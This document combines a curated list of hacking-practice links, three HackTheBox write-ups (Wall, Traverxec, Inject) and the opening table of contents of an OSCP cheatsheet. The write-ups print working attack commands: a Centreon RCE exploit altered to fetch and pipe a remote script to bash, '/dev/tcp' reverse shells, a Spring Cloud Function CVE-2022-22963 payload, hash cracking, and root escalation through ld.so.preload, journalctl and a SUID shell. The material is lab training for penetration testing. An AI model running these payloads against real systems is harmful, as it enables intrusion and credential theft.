various awesome lists for hackers, pentesters and security researchers - [awesome-infosec](https://github.com/onlurking/awesome-infosec) - A curated list of awesome infosec courses and training resources. - [Awesome Security](https://github.com/sbilly/awesome-security) - A collection of awesome software, libraries, documents, books, resources and cools stuffs about security. - [Awesome Security Gists](https://github.com/Hack-with-Github/Awesome-Security-Gists) - A collection of various GitHub gists for hackers, pentesters and security researchers - [ctf-resources](https://github.com/ctfs/resources) - A general collection of information, tools, and tips regarding CTFs and similar security competitions - [ctf-tools](https://github.com/zardus/ctf-tools) - This is a collection of setup scripts to create an install of various security research tools. - [H4cker](https://github.com/The-Art-of-Hacking/h4cker) - Thousands of resources related to ethical hacking / penetration testing, digital forensics and incident response (DFIR), vulnerability research, exploit development, reverse engineering, and more. - [Powerful Plugins](https://github.com/Hack-with-Github/Powerful-Plugins) - Powerful plugins and add-ons for hackers for dBurpSuite, Chrome, Firefox, IDA, etc - [pycurity](https://github.com/ninijay/pycurity) - Python Security Scripts - [SecLists](https://github.com/danielmiessler/SecLists) - SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. ## MOOC/Classes - https://cybersecuritybase.mooc.fi/ - [Attacks on Implementations of Secure Systems](https://github.com/Yossioren/AttacksonImplementationsCourseBook) ## Movies - [Movies for Hackers](https://github.com/k4m4/movies-for-hackers) ## News - https://threatpost.com/ - http://www.deepdotweb.com/ - https://packetstormsecurity.com/ - http://www.cvedetails.com/ ## Papers - [James Mickens](https://mickens.seas.harvard.edu/wisdom-james-mickens) - Harvard cybersecurity professor ## Podcasts - [10 Cybersecurity Podcasts, r/cybersecurity](https://www.reddit.com/r/cybersecurity/comments/8qqyw2/10_cybersecurity_podcasts_you_should_listen_to_in/) ## Practice - [Awesome Cyber Skills](https://github.com/joe-shenouda/awesome-cyber-skills) - [r/AskNetSec](https://www.reddit.com/r/AskNetsec/comments/8brzbr/getting_into_pen_testinghow_do_i_dive_into_ctf) - [23 Practice sites, r/HowToHack](https://www.reddit.com/r/HowToHack/comments/81f3hl/23_hacking_sites_ctfs_and_wargames_to_legally) - [List of Practice CTF sites](http://captf.com/practice-ctf/) - [Hack the Box](https://www.hackthebox.eu/) - [Black Box Society - The Box](https://blackboxsociety.org/the-box/) - Always on CTF - [Over The Wire](http://overthewire.org/wargames/) - [CryptoHack](https://cryptohack.org/challenges/) - https://www.pentesterlab.com/ - http://www.itsecgames.com/ - https://exploit-exercises.com/ - http://www.enigmagroup.org/ - http://smashthestack.org/ - http://3564020356.org/ - http://www.hackthissite.org/ - http://www.hackertest.net/ - http://0x0539.net/ - http://hacking.voyage/ - https://ctf.hacker101.com/about - https://attackdefense.com/ - http://www.gameofhacks.com/ - http://damnvulnerableiosapp.com/ - http://damnvulnerableiosapp.com/ - https://defendtheweb.net/?hackthis - https://www.hellboundhackers.org/ - https://www.mcafee.com/enterprise/en-us/downloads/free-tools.html - https://owasp.org/www-project-juice-shop/ - http://www.try2hack.lt/en/ ## Privacy - [PrivacyTools.io](https://www.privacytools.io/) - [That One Privacy Site](https://thatoneprivacysite.net/) ## Projects - [GitHub Showcase](https://github.com/topics/security) - [Security Programming Projects, r/AskNetSec](https://www.reddit.com/r/AskNetsec/comments/8chw3s/what_are_good_cyber_security_programming_projects/) ## Reddit ### Posts - [Videos and courses](https://www.reddit.com/r/Hacking_Tutorials/comments/aczz0l/if_you_like_watching_tutorials_to_learn_dump_of/) - [Learn NetSec](https://www.reddit.com/r/AskNetsec/comments/ar3fo5/learn_netsec/) ### Subreddits - [r/Cybersecurity](https://www.reddit.com/r/cybersecurity) - [r/HowToHack](https://www.reddit.com/r/howtohack) - [r/NetSec](https://www.reddit.com/r/netsec) - [r/NetSecStudents](https://www.reddit.com/r/netsecstudents) - [r/Security](https://www.reddit.com/r/security) - [r/SecurityCTF](https://www.reddit.com/r/securityctf) ## Software ### Distributions - https://www.kali.org/ - http://sourceforge.net/projects/metasploitable/ - https://tails.boum.org/ - http://ophcrack.sourceforge.net/ - https://n0where.net/blackarch-linux/ - http://seanux.net/index/en - http://sourceforge.net/p/attackvector/wiki/Home/(edited) ### Tools - [ctf-katana](https://github.com/ctf-katana/katana) - Automatic CTF Challenge Solver in Python3 - [CyberChef](https://gchq.github.io/CyberChef) - a web app for encryption, encoding, compression and data analysis - [Repo](https://github.com/gchq/CyberChef) - [Payload All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings) - A list of useful payloads and bypass for Web Application Security and Pentest/CTF - [PyCk](https://github.com/Naategh/PyCk) - A collection of useful Python hacking scripts for beginners - [Red Teaming Toolkit](https://github.com/infosecn1nja/Red-Teaming-Toolkit) - A collection of open source and commercial tools that aid in red team operations. - [Hacking tools](https://en.kali.tools/all/) ## Talks - [BugBounty Talk](https://docs.google.com/presentation/d/1xgvEScGZ_ukNY0rmfKz1JN0sn-CgZY_rTp2B_SZvijk/mobilepresent#slide=id.g4052c4692d_0_0) - [Awesome Sec Talks](https://github.com/PaulSec/awesome-sec-talks) - [Stanford Security Seminar](https://crypto.stanford.edu/seclab/sem.html) ## Websites - [Really nice website for figuring out where to start on CTF problems](https://ctf101.org/) - [cybrary.it](https://www.cybrary.it/) - [OSCP Goldmine](http://0xc0ffee.io/blog/OSCP-Goldmine ) - [ashot.org](https://www.ashot.org/links.php) - [Vulnerable sites, software and wargames](https://www.amanhardikar.com/mindmaps/Practice.html) - https://cybr.club/Important-Links/ - https://www.hacksplaining.com/ - https://www.exploit-db.com/google-hacking-database - Making it easier to use Google queries for pentesting - [Beginner's Curriculum](https://s3ctur.wordpress.com/2017/06/19/breaking-into-infosec-a-beginners-curriculum/) - [CTF Practice](https://zaratec.github.io/references/) - [InfoSecIITR Reading Material](https://github.com/infoseciitr/reading-material) - [CTF and Pentesting Tools](https://prune2000.github.io/tools/pentest/) - [CTF Candy](https://github.com/flawwan/CTF-Candy) - Useful tools and cheat sheet for Captures The Flag (CTF) contests. - [USCGA Tools](https://github.com/USCGA/tools) - The purpose of this repository is to act as an archive of tools that either we USCGA Cyber Team have built on our own or use. - [The Hacker's Choice Tips and Tricks](https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet) - [Hacker Education Resources](https://www.hackerone.com/sites/default/files/2020-01/Educational%20Resource%20Guide%20-%20Interactive.pdf) - from Hacker101 ## Writeups ### Writeup Repos - [bl4de](https://github.com/bl4de/ctf) - [p4](https://github.com/p4-team/ctf) - [sixstars](https://github.com/sixstars/ctf) - [Writeups 2017](https://github.com/ctfs/write-ups-2017) ### Writeups that I like, or explained problems I didn't solve, or taught me something new - [Google CTF 2018 - Rubik](http://blog.ebfe.dk/ctf/2017/06/20/googlectf2017-rubik/) - [TSG CTF 2019 - Obliterated File 1-2 Writeup](https://0xsaiyajin.github.io/writeup/2019/05/06/tsgctf-obliterated-file-1-2-writeup-eng.html) - [UTSA Cyber CTF 2019 - Linux2](https://0xsaiyajin.github.io/writeup/2019/05/02/utsacyber-ctf-linux-2-writeup-eng.html) - [UUCTF 2019](https://medium.com/bugbountywriteup/uutcf-2019-writeups-6c11ea3f9d22) ## YouTube Channels - [13Cubed](https://www.youtube.com/user/davisrichardg/videos) - [/dev/null](https://www.youtube.com/channel/UCGISJ8ZHkmIv1CaoHovK-Xw/videos) - [Gynvael Coldwind](https://www.youtube.com/user/GynvaelEN/videos) - [IppSec](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA/videos) - [John Hammond](https://www.youtube.com/channel/UCVeW9qkBjo3zosnqUbG7CFw) - [LiveOverflow](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w/videos)
# Wall <h1 align="center"> <br> <a href="https://www.hackthebox.eu/home/machines/profile/208"><img src="images/img.png" alt="wall"></a> <br> </h1> <h4 align="center"> Author: <a heref="https://www.hackthebox.eu/home/users/profile/91108" > thek</a></h4> *** __Machine IP__: 10.10.10.157 __DATE__ : 20/09/2019 *** ## Nmap ![](images/nmap.png) There are only 2 port open, the 3rd one in the scan is filtered. We start our enumeration from HTTP service. *** ## HTTP If we visit the IP in the browser we'll get `Apache2 Ubuntu Default Page`. So I started gobuster scan on it. ```bash ➜ gobuster -e -w CTFs/lists/big.txt -u http://10.10.10.157/ ``` We can see that there is `/monitoring` When we try to visit the URL it prompts for username and password. Since we don't have any hint about credentials we'll try to dictionary attack the login. We can use hydra or burp suite for cracking the password. I used burp suite, I loaded the default password list and used `admin` as username. After few minute you'll find out that the password is `password1`. Using `admin:password1` we are able to login but the moment we login we are redirected to `/centreon` ![](images/centreon.png) Since this look like some kind of monitoring tool I used `searchsploit` to search for centreon exploit and found one. ![](images/exploits.png) I downloaded the exploit and ran it like ```bash ➜ python centreon.py http://10.10.10.157/centreon/ admin password1 10.10.14.225 4444 ``` But this didn't trigger the shell because there are some changes required within the exploit. There is a line in the exploit ```json "nagios_bin": "ncat -e /bin/bash {0} {1} #".format(ip, port), ``` In the end it's using `#` the problem is server is running `mod_security-filter` triggers on `#`, so we have to find an alternative character for that or use someother way to get a shell. [@4ndr34z](https://twitter.com/4nqr34z) said that we can run a python server hosting a shell file and then wget that file using our RCE exploit. First let us edit the RCE exploit. Edit the RCE exploit in the following ways: * Remove line 22 - 25 i.e ```python if len(sys.argv) != 6: print(len(sys.argv)) print("[~] Usage : ./centreon-exploit.py url username password ip port") exit() ``` * Remove line 30 and 31 i.e ```python ip = sys.argv[4] port = sys.argv[5] ``` * Replace line 27-29 with: ```python url = "http://10.10.10.157/centreon/" username = "admin" password = "password1" ``` * Finally replace line 70 with ```json "nagios_bin": "wget${IFS}-qO-${IFS}http://<LocalIP>/shell${IFS}|${IFS}bash;" ``` Once you are done editing the exploit. Do the following things: * Make a shell script that will be executed on the machine - `echo "bash -I >& /dev/tcp/LocalIP/LOCALPORT 0>&1" > shell` - `chmod +x shell` * Start a python server on port 80 - `python3 -m http.server` - It's important to start the server on port 80 or else it __might__ not work * Run the exploit - `python centreon.py` If everything works out fine then you should have the shell. ![](images/rev.png) *** ## Privilege escalation I ran my enumeration script on the system and found out that there were 3 other users and there was a root SUID. ![](images/users.png) ![](images/suid.png) I used `searchsploit` to find the exploit for this SUID. ![](images/searchsploit.png) I have used this exploit in some other vulnhub machines and I know that this script causes some issue when we try to execute it at once. So I manually separated the code into 2 different files. * `libhax.c` ![](images/libhax.png) compile using: ```bash gcc -fPIC -shared -ldl -o libhax.so libhax.c ``` * `rootshell.c` ![](images/rootshell.png) compile using: ```bash gcc -o rootshell rootshell.c ``` Then I transfered both, `libhax.so` and `rootshell` to the machine and execute the following command one after the other ```bash $ cd /etc $ umask 000 $ screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" $ screen -ls $ ./tmp/rootshell ``` This will give us the root shell. ![](images/root-shell.png) __NOTE__: If you still have any doubt on how exploit is needed to be divided you can read my [vulnhub/DC5](https://mzfr.github.io/vulnhub-writeups/2019-07-09-DC5) writeup. Then we can grab the root flag ![](images/root.png) And since we didn't had the permission to read the `user` flag. Now we can get that too. ![](images/user.png) *** This was a beginner level machine since the only issue one might have is in running the RCE exploit. Thanks to [askar](https://twitter.com/mohammadaskar2) for making this machine. Also thanks to [@4ndr34z](https://twitter.com/4nqr34z) and [@d4mianwayne](https://twitter.com/D4mianWayne) for great team work. *** Thanks for reading, Feedback is always appreciated. Follow me [@0xmzfr](https://twitter.com/0xmzfr) for more “Writeups”. And if you'd like to support me considering [donating](https://mzfr.github.io/donate/) 😄
# Traverxec - Linux (Easy) ## Summary Traverxec was an interesting box that involved exploiting a RCE vulnerability in a webserver called Nostromo. I was able to get SSH access eventually and escalate this to fully compromise the machine. ## Enumeration I started Enumeration by running Rustscan on the the target. ``` rustscan -a $machine_IP -- -A -sV -sC -T4 -vv -sC - Script Scan -sV - Version Scan -T4 - Timing Template -A - Aggresive Scan Options -vv - Verbosity level rustscan -a $machine_IP -- -A -sV -sC -T4 -v .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : https://discord.gg/GFrQsGy : : https://github.com/RustScan/RustScan : -------------------------------------- Nmap? More like slowmap.🐢 [~] The config file is expected to be at "/root/.rustscan.toml" [!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers [!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. Open $machine_IP:22 Open $machine_IP:80 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0) 80/tcp open http syn-ack ttl 63 nostromo 1.9.6 |_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34 |_http-title: TRAVERXEC | http-methods: |_ Supported Methods: GET HEAD POST ``` ## Port 80 - HTTP Despite not getting substantial results from Nikto or Gobuster, the Nmap scan resulted in a version number for Nostromo - `1.9.6`. Running Searchsploit against this particular version provided a [RCE entry](https://www.exploit-db.com/exploits/47837) on ExploitDB. ![Searchsploit](Images/searchsploit.png) This exploit required the following syntax to appropriately work ``` Usage: python exploit.py <Target_IP> <Target_Port> <Command> ``` I was able to test this out by running the `id` command before expanding this to setup and pick up a reverse shell ![poc-id](Images/poc-id.png) ![poc-revshell](Images/poc-revshell.png) ![revshell](Images/revshell.png) This gave me an initial shell as `www-data` and I needed to pivot laterally to find a legitimate user to privesc as. I pulled Linpeas from my attacker box and I ran it on the target which came up with a MD5 hash for a user named David that I was able to crack with hashcat. ![pass-hash](Images/pass-hash.png) ![cracked-hash](Images/hashcat.png) Linpeas also identified a configuration directory at `/var/nostromo/conf` called `public_www` ``` www-data@traverxec:/$ cd /home/david/public_www www-data@traverxec:/home/david/public_www$ ls index.html protected-file-area www-data@traverxec:/home/david/public_www$ cd protected-file-area/ www-data@traverxec:/home/david/public_www/protected-file-area$ ls backup-ssh-identity-files.tgz ``` I was able to transfer this SSH backup file to my attack box. Since I knew the password, I was able to connect to the target using `wget` and pull down the file ``` wget http://david:Nowonly4me@$machine_IP/~david/protected-file-area/backup-ssh-identity-files.tgz ``` This had a hidden `.ssh` directory with the `id_rsa` file which unfortunately, was password protected. However, using `ssh2john` I was able to crack the hash. ``` ssh2john id_rsa > id_rsa.john john id_rsa.john --wordlist=/usr/share/wordlists/rockyou.txt ``` This provided the `id_rsa` key as `hunter` which I was able to use to login as David. ![ssh-access](Images/ssh.png) ## Privilege Escalation In this case I was not able to run `sudo -l` as a quick win and I don't believe that David is in the sudoers group in any case. However, running Linpeas again showed that the `/bin` directory had an interesting script present ``` #!/bin/bash cat /home/david/bin/server-stats.head echo "Load: `/usr/bin/uptime`" echo " " echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`" echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`" echo " " echo "Last 5 journal log lines:" /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat ``` This explains how `journalctl` is being run as root. I refer to the [GTFO Bins](https://gtfobins.github.io/gtfobins/journalctl/) entry for `journalctl` which explains how this can be bypassed. Interestingly, I am unable to run this and get less as my terminal is too big. As a workaround, I opened a new vertical terminal to sort this size issue and force the terminal into `less`. Once in `less`, I can escape to a root shell with `!/bin/bash` and grab the `root.txt` flag. ![root.txt](Images/root.txt.png) ![cert](Images/cert.png)
# Inject - HackTheBox - Writeup Linux, 20 Base Points, Easy ![info.JPG](images/info.JPG) ## Machine ![‏‏Inject.JPG](images/Inject.JPG) ## TL;DR To solve this machine, we start by using `nmap` to enumerate open services and find ports `22`, and `8080`. ***User***: Discovered a Local File Inclusion vulnerability on the image upload feature, which led to the discovery of a `pom.xml` file that revealed a vulnerable version of `spring-cloud-function-web` with `CVE-2022-22963`. Exploited the vulnerability to gain a reverse shell as `frank`. Found `phil`'s credentials in the `settings.xml` file on the `/home/frank/.m2/` directory. ***Root***: Observed a scheduled task running on the target machine which removed the contents of a directory `/opt/automation/tasks/` and copied the original file `playbook_1.yml` from `/root`. Found an Ansible playbook in `/opt/automation/tasks/`. Uploaded a new playbook that created an SUID of `/bin/sh` as `root`. ![pwn.JPG](images/pwn.JPG) ## Inject Solution ### User Let's begin by using `nmap` to scan the target machine: ```console ┌─[evyatar9@parrot]─[/hackthebox/Inject] └──╼ $ nmap -sV -sC -oA nmap/Inject 10.10.11.204 Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-01 22:40 IDT Nmap scan report for 10.10.11.204 Host is up (0.074s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 caf10c515a596277f0a80c5c7c8ddaf8 (RSA) | 256 d51c81c97b076b1cc1b429254b52219f (ECDSA) |_ 256 db1d8ceb9472b0d3ed44b96c93a7f91d (ED25519) 8080/tcp open nagios-nsca Nagios NSCA |_http-title: Home Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` Observing port `80`, we see that the following web page is hosted: ![port80.JPG](images/port80.JPG) Upon clicking the [Upload](http://10.10.11.204:8080/upload) button, we are directed to the following page: ![upload.JPG](images/upload.JPG) When uploading an image, a success message containing a link to http://10.10.11.204:8080/show_image?img=Cloud.png is displayed under the `View your image` section: ![view.JPG](images/view.JPG) This link is vulnerable to a [LFI](https://portswigger.net/web-security/file-path-traversal) attack. If the following request is sent: http://10.10.11.204:8080/show_image?img=../ , the following content is returned: ![lfi.JPG](images/lfi.JPG) During enumeration of the target, we discovered the `pom.xml` file located at `../../../../../../var/www/WebApp/pom.xml`, which contains the following: ```xml <?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd"> <modelVersion>4.0.0</modelVersion> <parent> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-parent</artifactId> <version>2.6.5</version> <relativePath/> <!-- lookup parent from repository --> </parent> <groupId>com.example</groupId> <artifactId>WebApp</artifactId> <version>0.0.1-SNAPSHOT</version> <name>WebApp</name> <description>Demo project for Spring Boot</description> <properties> <java.version>11</java.version> </properties> <dependencies> <dependency> <groupId>com.sun.activation</groupId> <artifactId>javax.activation</artifactId> <version>1.2.0</version> </dependency> <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-thymeleaf</artifactId> </dependency> <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-web</artifactId> </dependency> <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-devtools</artifactId> <scope>runtime</scope> <optional>true</optional> </dependency> <dependency> <groupId>org.springframework.cloud</groupId> <artifactId>spring-cloud-function-web</artifactId> <version>3.2.2</version> </dependency> <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-test</artifactId> <scope>test</scope> </dependency> <dependency> <groupId>org.webjars</groupId> <artifactId>bootstrap</artifactId> <version>5.1.3</version> </dependency> <dependency> <groupId>org.webjars</groupId> <artifactId>webjars-locator-core</artifactId> </dependency> </dependencies> <build> <plugins> <plugin> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-maven-plugin</artifactId> <version>${parent.version}</version> </plugin> </plugins> <finalName>spring-webapp</finalName> </build> </project> ``` Of particular interest is the following dependency: ```xml <dependency> <groupId>org.springframework.cloud</groupId> <artifactId>spring-cloud-function-web</artifactId> <version>3.2.2</version> </dependency> ``` We have identified that the version of the dependency mentioned above is affected by `CVE-2022-22963`, and a proof-of-concept (POC) exploit for this vulnerability is available at the following link: https://github.com/lemmyz4n3771/CVE-2022-22963-PoC. In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources ([Reference](https://nvd.nist.gov/vuln/detail/CVE-2022-22963)). The exploit adds an HTTP header with a command injection payload in the following format: ```java spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch /tmp/test3.sh") ``` Let's use it: ```console ┌─[evyatar9@parrot]─[/hackthebox/Inject] └──╼ $ python3 poc.py 10.10.11.204:8080 'touch /tmp/test.sh' [+] Host is vulnerable [+] Command executed [+] Exploit completed ``` Using the LFI vulnerability, it's possible to view the file created at `../../../../../../tmp`: ![testsh.JPG](images/testsh.JPG) The following payload can be used to obtain a reverse shell `bash -c bash${IFS}-i${IFS}>&/dev/tcp/10.10.14.14/4242<&1`: ```console ┌─[evyatar9@parrot]─[/hackthebox/Inject] └──╼ $ python3 poc.py 10.10.11.204:8080 'bash -c bash${IFS}-i${IFS}>&/dev/tcp/10.10.14.14/4242<&1' [+] Host is vulnerable [+] Command executed [+] Exploit completed ``` A reverse shell is obtained as the user `frank`: ```console ┌─[evyatar9@parrot]─[/hackthebox/Inject] └──╼ $ nc -lvp 4242 listening on [any] 4242 ... connect to [10.10.14.9] from inject.htb [10.10.11.204] 58222 bash: cannot set terminal process group (812): Inappropriate ioctl for device bash: no job control in this shell frank@inject:/$ ``` During enumeration of the target using the `frank` user, we discovered the credentials of the `phil` user in the `settings.xml` file: ```console frank@inject:~/.m2$ pwd pwd /home/frank/.m2 frank@inject:~/.m2$ cat settings.xml cat settings.xml <?xml version="1.0" encoding="UTF-8"?> <settings xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd"> <servers> <server> <id>Inject</id> <username>phil</username> <password>DocPhillovestoInject123</password> <privateKey>${user.home}/.ssh/id_dsa</privateKey> <filePermissions>660</filePermissions> <directoryPermissions>660</directoryPermissions> <configuration></configuration> </server> </servers> </settings> ``` We can use those credentials to proceed with further enumeration or any authorized actions: ```console frank@inject:~/.m2$ su phil su phil Password: DocPhillovestoInject123 python3 -c 'import pty; pty.spawn("/bin/bash")' phil@inject:/home/frank/.m2$ whoami phil python3 -c 'import pty; pty.spawn("/bin/bash")' phil@inject:/home/frank/.m2$ cat /home/phil/user.txt fc2aaab46fcb9e2ecd2f6a3b5a4b2339 ``` And we get the user flag `fc2aaab46fcb9e2ecd2f6a3b5a4b2339`. ### Root Upon observing the running processes on the target machine, we have identified the following scheduled process: ```console root 954 0.0 0.0 6816 2968 ? Ss 20:22 0:00 /usr/sbin/cron -f root 1963 0.0 0.0 8360 3340 ? S 20:32 0:00 _ /usr/sbin/CRON -f root 1972 0.2 0.0 2608 532 ? Ss 20:32 0:00 _ /bin/sh -c sleep 10 && /usr/bin/rm -rf /opt/automation/tasks/* && /usr/bin/cp /root/playbook_1.yml /opt/automation/tasks/ ``` We can observe that the `root` user removes the files from the directory and copies the original file from `/root`. Now, let's proceed to observe the contents of the file located at `/opt/automation/tasks/playbook_1.yml`: ```console cat /opt/automation/tasks/playbook_1.yml - hosts: localhost tasks: - name: Checking webapp service ansible.builtin.systemd: name: webapp enabled: yes state: started ``` We can determine that this is an Ansible playbook. Given that the file is named `playbook_1.yml`, we can speculate that if we create a file named `playbook_2.yml` with our desired command, it will be executed when the scheduled process runs. We can proceed by creating a new file named `playbook_2.yml` in the directory `/opt/automation/tasks`, which contains our desired command using the `ansible.builtin.shell` tag as outlined in the [Ansible documentation](https://docs.ansible.com/ansible/latest/collections/ansible/builtin/shell_module.html): ```console ┌─[evyatar9@parrot]─[/hackthebox/Inject] └──╼ $ cat playbook_2.yml - hosts: localhost tasks: - name: command ansible.builtin.shell: cmd: touch /home/phil/test ``` After uploading the playbook file to `/opt/automation/tasks` and waiting for a few seconds, we can observe the creation of a new file in `/home/phil`: ```console phil@inject:/opt/automation$ ls -ltra /home/phil/ ls -ltra /home/phil/ total 28 -rw-r--r-- 1 phil phil 807 Feb 25 2020 .profile -rw-r--r-- 1 phil phil 3771 Feb 25 2020 .bashrc lrwxrwxrwx 1 root root 9 Feb 1 07:40 .bash_history -> /dev/null drwxr-xr-x 4 root root 4096 Feb 1 18:38 .. drwx------ 2 phil phil 4096 Feb 1 18:38 .cache -rw-r----- 1 root phil 33 Apr 2 20:22 user.txt drwx------ 2 phil phil 4096 Apr 2 20:32 .gnupg -rw-r--r-- 1 root root 0 Apr 2 20:46 test drwxr-xr-x 4 phil phil 4096 Apr 2 20:46 . ``` Now we can create an SUID file of `/bin/sh` using the following task: ```console ┌─[evyatar9@parrot]─[/hackthebox/Inject] └──╼ $ cat playbook_2.yml - hosts: localhost tasks: - name: command ansible.builtin.shell: cmd: cp /bin/sh /home/phil/.sh && chmod 4755 /home/phil/.sh ``` And we can see the following SUID file has been created on `/home/phil/`: ```console phil@inject:/opt/automation$ ls -ltra /home/phil/ ls -ltra /home/phil/ total 156 -rw-r--r-- 1 phil phil 807 Feb 25 2020 .profile -rw-r--r-- 1 phil phil 3771 Feb 25 2020 .bashrc lrwxrwxrwx 1 root root 9 Feb 1 07:40 .bash_history -> /dev/null drwxr-xr-x 4 root root 4096 Feb 1 18:38 .. drwx------ 2 phil phil 4096 Feb 1 18:38 .cache -rw-r----- 1 root phil 33 Apr 2 20:22 user.txt drwx------ 2 phil phil 4096 Apr 2 20:32 .gnupg -rw-r--r-- 1 root root 0 Apr 2 20:46 test -rwsr-xr-x 1 root root 129816 Apr 2 21:00 .sh drwxr-xr-x 4 phil phil 4096 Apr 2 21:00 . ``` Now that we have created the SUID file of `/bin/sh`, we can execute it to obtain a `root` shell: ```console phil@inject:/opt/automation$ /home/phil/.sh -p /home/phil/.sh -p # whoami whoami root # cat /root/root.txt cat /root/root.txt 3b35d1d1570d8b36d565f4bfc7beeff0 ``` And we get the root flag `3b35d1d1570d8b36d565f4bfc7beeff0`.
# OSCP Cheatsheet The following collection is a wild (but structured) selection of commands, snippets, links, exploits, tools, lists and techniques I personally tested and used on my journey to becoming an OSCP. I will extend, restructure and update it from time to time, so let's see where this is going. **THIS IS WORK IN PROGRESS** ## Disclaimer This cheatsheet is definitely not "complete". I am sure i forgot to write down hundreds of essential commands, used most of them in the wrong way with unnessecary flags and you'll probably soon ask yourself how i've even made it through the exam. Also you might think a certain tool used should be in another phase of the attack (e.g certain nmap vulnerabitly scripts should be in Exploitation). That's okay, imho the edges between different stages of a penetration test are very blurry. Feel free to issue a PR if you want to help to improve the list. *There are a number of tools you are not allowed to use during your OSCP exam. At the time of writing, sqlmap is one of them. Check which tools are restricted/banned before you use them in your exam. You can find detailed information about tool usage in the exam guidelines.* **Use for educational purposes only!** *** # Table Of Content - [OSCP Cheatsheet](#oscp-cheatsheet) * [Disclaimer](#disclaimer) - [Reconnaissance](#reconnaissance) * [Autorecon](#autorecon) * [Nmap](#nmap) + [Initial Fast TCP Scan](#initial-fast-tcp-scan) + [Full TCP Scan](#full-tcp-scan) + [Limited Full TCP Scan](#limited-full-tcp-scan) + [Top 100 UDP Scan](#top-100-udp-scan) + [Full Vulnerability scan](#full-vulnerability-scan) + [Vulners Vulnerability Script](#vulners-vulnerability-script) + [SMB Vulnerabitlity Scan](#smb-vulnerabitlity-scan) * [Gobuster](#gobuster) + [HTTP](#http) - [Fast Scan (Small List)](#fast-scan--small-list-) - [Fast Scan (Big List)](#fast-scan--big-list-) - [Slow Scan (Check File Extensions)](#slow-scan--check-file-extensions-) + [HTTPS](#https) * [SMBCLIENT](#smbclient) + [List Shares (As Guest)](#list-shares--as-guest-) + [Connect to A Share (As User John)](#connect-to-a-share--as-user-john-) + [Download All Files From A Directory Recursively](#download-all-files-from-a-directory-recursively) + [Alternate File Streams](#alternate-file-streams) - [List Streams](#list-streams) - [Download Stream By Name (:SECRET)](#download-stream-by-name---secret-) * [Enum4Linux](#enum4linux) + [Scan Host](#scan-host) + [Scan Host, Suppress Errors](#scan-host--suppress-errors) * [NFS](#nfs) + [Show mountable drives](#show-mountable-drives) + [Mount Drive](#mount-drive) * [WebApp Paths](#webapp-paths) * [SQLMAP](#sqlmap) + [Get Request](#get-request) + [Test All (Default Settings)](#test-all--default-settings-) - [Test All (Default Settings, High Stress)](#test-all--default-settings--high-stress-) + [Post Request (Capture with BURP)](#post-request--capture-with-burp-) - [Test All (Default Settings)](#test-all--default-settings--1) - [Test All (Default Settings, High Stress)](#test-all--default-settings--high-stress--1) - [Get A Reverse Shell (MySQL)](#get-a-reverse-shell--mysql-) - [Brute Force](#brute-force) * [Hydra](#hydra) + [HTTP Basic Authentication](#http-basic-authentication) + [HTTP Get Request](#http-get-request) + [HTTP Post Request](#http-post-request) + [MYSQL](#mysql) - [File Transfer](#file-transfer) * [Powershell](#powershell) + [As Cmd.exe Command](#as-cmdexe-command) + [Encode Command for Transfer](#encode-command-for-transfer) * [Certutil](#certutil) + [Download](#download) + [Download & Execute Python Command](#download---execute-python-command) * [SMB](#smb) + [Start Impacket SMB Server (With SMB2 Support)](#start-impacket-smb-server--with-smb2-support-) + [List Drives (Execute on Victim)](#list-drives--execute-on-victim-) + [Copy Files (Execute on Victim)](#copy-files--execute-on-victim-) * [PureFTP](#pureftp) + [Install](#install) + [Create setupftp.sh Execute The Script](#create-setupftpsh-execute-the-script) + [Get Service Ready](#get-service-ready) - [Reset Password](#reset-password) - [Commit Changes](#commit-changes) - [Restart Service](#restart-service) + [Create FTP Script (On Victim)](#create-ftp-script--on-victim-) + [Exectue Script (on Victim)](#exectue-script--on-victim-) * [Netcat](#netcat) * [Receiving Shell](#receiving-shell) * [Sending Shell](#sending-shell) * 